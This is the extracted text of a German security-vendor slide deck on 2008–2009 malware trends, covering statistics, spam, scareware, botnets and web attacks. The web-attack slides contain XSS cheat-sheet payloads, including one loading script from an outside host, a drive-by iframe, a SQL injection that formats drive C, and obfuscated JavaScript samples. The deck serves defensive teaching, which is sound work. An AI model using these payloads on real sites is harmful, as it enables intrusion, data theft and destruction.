Geschützt. Geschützter. G DATA.

Malware-Trends 2009

Ralf Benzmüller G DATA Security Labs

Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail & Spam •! Webseiten

!! Botnetze

Security Labs: Aufgaben !! Entwicklung von Schutzkonzepten !! Integration in Schutzsoftware !! Risiko-Szenarien !! Kundeninformationen !! Tests •! Lizenzprodukte •! Eigene Technologien

Malware sammeln

Spamtraps WebCrawler Honeypots Tauschprg. Kunden

Zahlen zur Malwaresammlung !! Samples: 5.278.023 !! Malware: 476.609

!! Zum Vergleich: AV-Test !! 420.921 aktive Schädlinge letzte Woche in D !! 616.581 aktive Schädlinge letzte Woche weltweit

Malware sammeln Monat Viren Samples SigKAV SigAVA

2 2008 5.865 158.524 36.331 4.780

3 2008 10.346 185.276 66.268 8.013

4 2008 11.611 220.825 47.360 12.073

5 2008 15.291 151.009 70.153 9.637

6 2008 19.588 227.973 68.722 6.617

7 2008 22.110 179.393 108.590 7.836

8 2008 24.127 225.221 98.528 2.357

9 2008 17.544 151.589 98.699 2.691

10 2008 14.857 154.439 70.888 1.775

11 2008 74.962 237.734 90.411 2.913

12 2008 80.384 256.905 99.401 1.414

1 2009 40.674 374.919 148.946 1.793

Summe 340.128 2.523.807 1.004.297 63.869

Malware analysieren Datei

-eigenschaften Statische

Analyse/ Graphen Dynamische

Analyse/ Sandbox

Datenbank

Manuelle Detailanalyse

Multiscanner

Malware analysieren !! Zweckgebunden !! Weitgehend automatisiert !! Tools zum Ermitteln von

Oberflächeninformationen !! Dynamische Analyse mit CWSandbox !! Statische Analyse u.a. mit Graphen

Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail & Spam •! Webseiten

!! Botnetze

Malware-Report 2008 H2 !! 2008: 894.250 neue Schädlinge

ca. 6,7 Mal mehr als 2007 !! 576.002 neue Schädlinge im 2. Halbjahr

Steigerung um das 1,8 fache gegenüber dem ersten Halbjahr

Malware-Report 2008 H2

Malware-Report 2008 H2

Malware-Report 2008 H2

!! JavaScript Malware nimmt ab (1910 vs 2650) !! Flash-Malware nimmt zu (321 vs 231)

Flash-Phishing

Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail •! Webseiten

!! Botnetze

Verbreitungswege von Malware

!! E-Mail !! Webseiten •! Download •! Drive-By Infektion

!! Net-Worm

!! Instant Message WLAN

!! USB-Datenträger !! CDs, DVDs !! P2P

GetCodec im Media Player

GetCodec im MediaPlayer !! WMV/WMA enthalten eine Sektion, die

den erforderlichen Codec bestimmen. !! Diese Sektion wird so manipuliert, dass der

Media Player einen Codec verlangt. !! Spätere Varianten auch mit MP3 und MP2

Dateien.

Der Trick mit den Links !!Rechnung.zip enthält •! Rechnung.txt.lnk •! Zertifikat.ssl

!! http://www.gdata.de/de/virenforschung/news/news-details/article/928-warnung-vor-gefaelschten-rechn.html

Top 10 CNN-News Schlagzeilen

1. SUSPECT IN BEHEADING IDENTIFIED 2. JUDGE TAKEN OFF LAST JENA 6 CASES 3. PEOPLE MAG GETS PITT-JOLIE PIX 4. ATTACK IN TORONTO CALLED RACIAL 5. IREPORTERS' UNUSUAL NAMES 6. MOTHER PLEADS FOR CHILD'S RETURN 7. KARADZIC: I MADE DEAL WITH U.S. 8. SUSPECT ARRESTED IN SWIM KILLINGS 9. ANTHRAX SUSPECT APPARENT SUICIDE 10. MCCAIN: OBAMA CRITICISM 'FAIR'

Top 10 CNN-News Videos

1. MONTAUK 'MONSTER' 2. RACY PHOTOS OF TODDLER'S MOM 3. NEWS OF THE ABSURD EPISODE 54 4. POLICE BEATING DISPUTE 5. MOM PLEADS FOR GIRL'S RETURN 6. DEFENDANT FAKES HEART ATTACK 7. KILLER CARRIED VICTIM'S HEAD 8. MURDER CONFESSION RECANTED 9. ANTHRAX SUSPECT'S HOME 10. HECKLERS INTERRUPT OBAMA TALK

Promi-Spam

Promi-Spam

Femmes %

Angelina Jolie 18 %

Britney Spears 9,8 %

Paris Hilton 8,8 %

Madonna 2 %

Pamela Anderson 1,9 %

Hommes %

Osama bin Laden 3,4 %

Brad Pitt 1,8%

John McCain 1,4 %

Georg W. Bush 1,2 %

Barack Obama 1,1 %

Falsche Freunde

Spam-Trends

•! Täglich ca. 130 Mia. Spam-Mails

•! 85% Spam per Botnetz

•! Spam – Phishing

•! Spam – Malware (Dateien oder URLs)

•!Spam-Schutz = Malware-Schutz

Spam: Zahlen und Daten 2007: 84.6 %

2008: 74 %

Spam-Trends

•! 80% aller Spam-Mails werden von 110 Gangs verschickt

•! 6 der Top 10 Spammer agieren in Osteuropa (Russland, Ukraine)

Top Spam Gangs Rang Land #

1 USA 62

2 Russland 9

2 Canada 9

4 China 4

5 Brasilien, Indien, Japan, Ukraine

3

spamhaus.org, 12.Nov 2008

Insgesamt: 110 Gangs für 80% aller Spam-Mails

Spamerkennung •! Absender

•! Whitelist & Blacklist •! Realtime Blackhole List von Spam-Relays

•! Inhaltsfilter •! Schlüsselwörter in Betreff oder Text •! URL-Blocking •! E-Mail Eigenschaften (Heuristik) •! Bayes-Filter erkennt Worthäufigkeiten

•! Meta •! Greylisting •! Hash database

Spamschutz: Textfilter

Spamschutz: Textfilter

HTML TABLE <table border="0" width="74"> <TR vAlign=bottom> <td rowSpan="2" nowrap>NE</TD><TD><font color="#DDC3EB">9</font></TD> <td rowSpan="2" nowrap>&nbsp;</TD><TD></TD> <td rowSpan="2" nowrap>N</TD> <TD><font color="#EBC3C5">S</font></TD> <td rowSpan="2" nowrap>!&nbsp;WE</TD> <TD><font color="#E3C3EB">R</font></TD> <td rowSpan="2" nowrap>M</TD> <TD></TD> <td rowSpan="2" nowrap>8</TD> <TD></TD> <td rowSpan="2" nowrap>0</TD> <TD><font color="#C3EBC3">O</font></TD></tr> <tr vAlign=bottom> <td nowrap>W</TD> <td nowrap>CASI</TD> <td nowrap>O</TD> <td nowrap>LCO</TD> <td nowrap>E&nbsp;BONUS&nbsp;$1</TD> <td nowrap>0</TD> <td nowrap>&nbsp;!!!</TD></tr></table>

Reputation unterlaufen !! CAPTCHAs von Freemailern knacken !! E-Mail-Zugangsdaten per Phishing oder

Spyware stehlen !! Missbrauch legitimer Hosting-Sites

Google Docs-Spam !! Seit Jan 2007 !! Link zu Google Docs

Legitime Bildquellen

!! Flickr !! ImageShack !! Live.com !! BlogSpot

URL Redirection

!! http://rds.yahoo.com/_ylt=3DA0ge... EXP=3D.../**http%3a//SPAMSITE.com/

!! http://www.google.com/pagead/iclk?sa= l&...&adurl=http://SPAMSITE.com

Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail & Spam •! Webseiten

!! Botnetze

Scareware

!"#!!$%&'()*+,-./

!$%&'()*!".!**'.-+,-./

#!((0&'()*+,-./

,-.1)20(&!32+,-./

4'3'2!"0(*,5)26+,-./

#0((!.0$2!$%&'()*+,-./

7"20(1(-3(!.+,-./

7"2(040&'()*+,-./

300$'$#0,%0+,-./

5!(44('&07"20(+,-./

80'$0'$#08%-$0$+,-./

"-$3)0&'01,+,-./

$-$*2-1!$%&'()*+,-./

1,!$%&'(0$"-0*)$3+,-./

Aktionen

Ihr PC ist infiziert

Scareware

Scareware Auswahl !! Advanced Cleaner Free !! AntiMalware 2009 !! AntiSpyware Pro XP !! Antivirus 2008 XP !! Antivirus 2010 !! Antivirus Lab 2009 !! Antivirus Security !! Antivirus XP 2008 !! Drive Cleaner !! eAntivirusPro !! eKerberos !! Error Digger !! Error Safe !! Internet Antivirus !! Micro Antivirus 2009 !! MS Antivirus !! Online PC Guard

!! Personal Antispy !! Power Antivirus !! Power Antivirus 2009 !! Privacy Protector !! Rapid Antivirus !! Smart Antivirus 2009 !! System Antivirus 2008 !! Total Secure 2009 !! Virus Remover 2008 !! Virus Response Lab 2009 !! Win AntiVirusPro 2007 !! Win Fixer !! Windows Antivirus !! WinX Security Center !! XP Antispyware 2009 !! XP Antivirus !! XP Protector 2009

Scareware

Scareware verboten !! 11. Dezember 2008:

FTC untersagt Innovative Marketing, Inc. und ByteHosting Internet Services, LLC den Verkauf ihrer angeblichen Schutzprogramme Das Vermögen der Firmen wird eingefroren.

Cross Site Scripting (XSS)

Funktionsweise XSS !! http://www.linksfraktion.de/kontakt.php?

nachname=&strasse=&plz=&ort=&mailadresse=&anfragetext=&eintrag=ok&send=Abschicken&vorname=%22%3E%3Cdiv%20style%3Dposition%3Arelative%3Bleft%3A-12pt%3Btop%3A-413pt%3Bbackground-color%3Awhite%3Bwidth%3A95%25%3B%3E27.05.2008%3Ch2%3EDie%20Linke%20stimmt%20f%C3%BCr%20Hotte%20K%C3%B6hler%3C%2Fh2%3ESelbstverst%C3%A4ndlich%20wurde%20auch%20diese%20Meldung%20%C3%BCber%20eine%20XSS-L%C3%BCcke%20eingeschmuggelt.%3C%2Fdiv%3E%3Cdiv%3E

XSS Cheat Sheet !! <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> !! <IMG SRC=javascript:alert('XSS')> !! <IMG

SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

!! <BODY BACKGROUND="javascript:alert('XSS')"> !! <BGSOUND SRC="javascript:alert('XSS');"> !! <BODY ONLOAD=alert('XSS')>

Vgl.: http://ha.ckers.org/xss.html

XSS - potential !! Defacements !! Daten aus Formularen stehlen (e.g. Login-Seiten,

Online Banking) !! Cookies stehlen (z.B. auf einer Webseite Befehle

im Namen des Cookie-Eigentümers ausführen) !! Wurm !! JavaScript Proxy !! Port Scanner

ClickJacking !! Einstellungen von Flash so

ändern, dass die Webcam angeschaltet wird

Funktionsweise Drive-by Infektion

!! <iframe src="http://example.com/bad.php visibility="hidden"...>

!! <script ... src="boese.js"> !! <img ... src="boese.js"> !! JavaScript nutzt Sicherheitslücken im

Browser und Browser-Plugins

SQL Injection !! search item: "foo" !! http://myserver.de/search.php?s=foo !! SELECT info, title FROM mytable WHERE s

like '%foo%'

SQL Injection !! search item

"foo' ; GO EXEC cmdshell('format C') --" !! SELECT info, title FROM mytable WHERE s

like '%foo' ; GO EXEC cmdshell('format C') --%'

!! This command would delete everything on drive C:

SQL Injection - potential !! Spy on data !! Data manipulation (e.g. insert malicious

IFRAME to resulting web page) !! Create new users !! Access to file system = compromise

database machine

Code Verschleierung !! "<sc" + "rip" + "t>"

!! var oiwetdk!er = decode; var rierjwtlkjfre = oiwetdk!er rierjwtlkjfre("%3C%73%63%72%69%70%74%3E");

!! Whitespace (0x0A, 0x0D)

!! document.write(unencode("% 3C%73%63%72%69%70%74%3E ");

Code Verschleierung unescape('%3C%73%63%72%69%70%74');

<script> var s='3C736372697074'; var o=''; for(i=0;i<s.length;i=i+2) { o=o+'%'+s.substr(i,2);} document.write(unescape(o)); </script>

Code-Verschleierung !! xml||var|if|function|document|domain|

send|return|path|wDate||select|name|begin|new|index|www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut|

JavaScript Encoder - Input <SCRIPT> alert('XSS'); </SCRIPT>

JavaScript Encoder - Output <script language=javascript>

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E')); dF('%264DTDSJQU%264F%2631bmfsu%2639%2638YTT%2638%263%3A%264C%2631%264D0TDSJQU%264F%261B1')

</script>

JavaScript Encoder dekodiert <script language="javascript">

function dF(s) { var s1=unescape(s.substr(0,s.length-1)); var t=''; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1)); document.write(unescape(t));} </script>')); dF('&4DTDSJQU&4F&31bmfsu&39&38YTT&38&3:&4C&31&4D0TDSJQU&4F&1B1')

</script>

JavaScript Packer !! Dojo Shrink Safe !! MOOtools !! Dean Edwards Packer

Überblick auf.: http://www.secureworks.com/research/threats/thepacker/?threat=thepacker

Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail •! Webseiten

!! Botnetze

Cybercrime-Ökonomie

Dealer

Infrastruktur !! Handelsplattform !! Botnetze !! Hosting

Zulieferer !! Malware !! Exploits !! AntiDetection !! Tools !! Daten

Cashing !! MoneyMule !! Carder !! Drops !! etc...

Kunden Anbieter !! Spam !! DDoS !! Phishing !! Adware !! Ransomware !! etc...

Werbung

Botnetze

Botnetze – Größe

2.2.2009: shadowserver.org

Botnetze C&C

2.2.2009: shadowserver.org

Geografische Verteilung 2007

2.2.2009: shadowserver.org

Botnetze – C&C Locations

Quelle: Shadowserver.org

Zombie Activity Level

Zombie static vs. dynamic

Botnetze !! Q4 2008: 301.000 neue Zombies pro Tag

Top 5 Spam Botnetze Pos Name #Bots #Spam

1 Srizbi 315.000 60 Mia/d

2 Bobax/ Kraken 185.000 9 Mia/d

3 Rustock 150.000 30 Mia/d

4 Cutwail 125.000 16 Mia/d

5 Storm 85.000 3 Mia/d Quelle: http://www.secureworks.com/research/threats/topbotnets/?threat=topbotnets

Malware-Report 2008 H2

Erpressung !! Verteilte Überlastangri"e (DDoS) •! Mailserver •! Webserver

2.2.2009: shadowserver.org

Malware-Report 2008 H2

Geschützt. Geschützter. G DATA